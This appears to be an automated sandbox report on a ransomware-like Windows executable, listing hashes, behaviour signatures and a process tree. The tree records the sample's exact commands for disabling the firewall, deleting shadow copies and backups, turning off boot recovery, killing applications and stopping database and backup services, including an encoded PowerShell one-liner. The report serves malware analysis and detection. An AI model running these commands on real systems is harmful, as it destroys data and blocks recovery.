Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    22/07/2020, 08:54

General

  • Target

    Deniz_K_z_.bin.exe

  • Size

    3.4MB

  • MD5

    fc78e6e58352151fb77a4b92f239d381

  • SHA1

    4dda3af9601922394f0c16713180beb2ec88c050

  • SHA256

    c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e

  • SHA512

    4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489

Malware Config

Signatures

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • System policy modification 1 TTPs 17 IoCs
  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies service 2 TTPs 4 IoCs
  • UAC bypass 3 TTPs
  • Suspicious use of WriteProcessMemory 177 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Disables Task Manager via registry modification
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Modifies Windows Firewall 1 TTPs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
    1⤵
    • Checks whether UAC is enabled
    • System policy modification
    • Suspicious use of WriteProcessMemory
    • Drops file in Drivers directory
    PID:976
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3448
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode disable
        3⤵
          PID:2052
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3848
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
          3⤵
          • Interacts with shadow copies
          PID:3092
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3928
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
          3⤵
          • Interacts with shadow copies
          PID:3768
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im sql.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3692
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im winword.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2020
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im wordpad.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im outlook.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3852
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im thunderbird.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im oracle.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1008
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im excel.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:868
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im onenote.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2992
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im virtualboxvm.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1004
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im node.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3172
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im QBW32.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1760
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WBGX.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3852
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im Teams.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im Flow.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3728
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3620
        • C:\Windows\SysWOW64\net.exe
          net stop DbxSvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3796
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop DbxSvc
            4⤵
              PID:648
          • C:\Windows\SysWOW64\net.exe
            net stop OracleXETNSListener
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3356
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop OracleXETNSListener
              4⤵
                PID:408
            • C:\Windows\SysWOW64\net.exe
              net stop OracleServiceXE
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2908
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop OracleServiceXE
                4⤵
                  PID:1140
              • C:\Windows\SysWOW64\net.exe
                net stop AcrSch2Svc
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1644
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop AcrSch2Svc
                  4⤵
                    PID:3788
                • C:\Windows\SysWOW64\net.exe
                  net stop AcronisAgent
                  3⤵
                    PID:3848
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop AcronisAgent
                      4⤵
                        PID:2020
                    • C:\Windows\SysWOW64\net.exe
                      net stop Apache2.4
                      3⤵
                        PID:3784
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop Apache2.4
                          4⤵
                            PID:1440
                        • C:\Windows\SysWOW64\net.exe
                          net stop SQLWriter
                          3⤵
                            PID:3292
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SQLWriter
                              4⤵
                                PID:408
                            • C:\Windows\SysWOW64\net.exe
                              net stop MSSQL$SQLEXPRESS
                              3⤵
                                PID:2204
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
                                  4⤵
                                    PID:1132
                                • C:\Windows\SysWOW64\net.exe
                                  net stop MSSQLServerADHelper100
                                  3⤵
                                    PID:3824
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                      4⤵
                                        PID:564
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop MongoDB
                                      3⤵
                                        PID:1744
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop MongoDB
                                          4⤵
                                            PID:3896
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop SQLAgent$SQLEXPRESS
                                          3⤵
                                            PID:1644
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
                                              4⤵
                                                PID:1168
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop SQLBrowser
                                              3⤵
                                                PID:2436
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop SQLBrowser
                                                  4⤵
                                                    PID:1844
                                                • C:\Windows\SysWOW64\net.exe
                                                  net stop CobianBackup11
                                                  3⤵
                                                    PID:648
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 stop CobianBackup11
                                                      4⤵
                                                        PID:2812
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net stop cbVSCService11
                                                      3⤵
                                                        PID:2880
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 stop cbVSCService11
                                                          4⤵
                                                            PID:3864
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net stop QBCFMontorService
                                                          3⤵
                                                            PID:1936
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop QBCFMontorService
                                                              4⤵
                                                                PID:3192
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop QBVSS
                                                              3⤵
                                                                PID:1508
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop QBVSS
                                                                  4⤵
                                                                    PID:3868
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3504
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
                                                                  3⤵
                                                                    PID:3512
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 700
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:656
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
                                                                  2⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2572
                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                    vssadmin delete shadows /all /quiet
                                                                    3⤵
                                                                    • Interacts with shadow copies
                                                                    PID:2996
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    wmic shadowcopy delete
                                                                    3⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:512
                                                              • C:\Windows\system32\vssvc.exe
                                                                C:\Windows\system32\vssvc.exe
                                                                1⤵
                                                                • Modifies service
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3644

                                                              Network

                                                              MITRE ATT&CK Enterprise v6

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • memory/656-24-0x0000000004610000-0x0000000004611000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/656-23-0x0000000004610000-0x0000000004611000-memory.dmp

                                                                Filesize

                                                                4KB